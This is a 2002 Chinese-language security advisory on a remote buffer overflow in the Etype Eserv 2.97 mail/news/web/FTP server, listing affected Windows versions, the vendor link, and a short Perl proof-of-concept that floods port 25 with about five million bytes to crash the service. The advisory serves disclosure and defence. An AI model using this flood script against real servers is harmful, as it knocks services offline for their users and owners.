首页 -> 安全研究

安全研究

安全漏洞
EServ远程缓冲区溢出漏洞

发布日期:2002-12-13
更新日期:2002-12-19

受影响系统:
Etype Eserv 2.97
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
不受影响系统:
Etype Eserv 2.99
描述:
BUGTRAQ  ID: 6391

Eserv是一款集成Mail、News、Web、FTP和代理服务器的系统。

Eserv多个服务对超多数据请求缺少正确处理,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可导致系统产生拒绝服务。

攻击者向119、25、110、21端口发送超过5M的数据,可导致由于堆栈内存破坏而使服务崩溃,精心构建提交数据可能以服务进程权限在系统上执行任意指令。

<*来源:securma massine (securma@caramail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103979685017805&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

securma massine (securma@caramail.com)提供了如下测试方法:

#!/usr/bin/perl -w
#greetz: marocit
#tool Eserv_dos.pl
use IO::Socket;
$buffer = "A"x 5080000 ;
$hel = "HELO "
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$hel$buffer";
print "\nsending exploit......\n\n";

建议:
厂商补丁:

Etype
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.eserv.ru/eserv/

浏览次数:2721
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障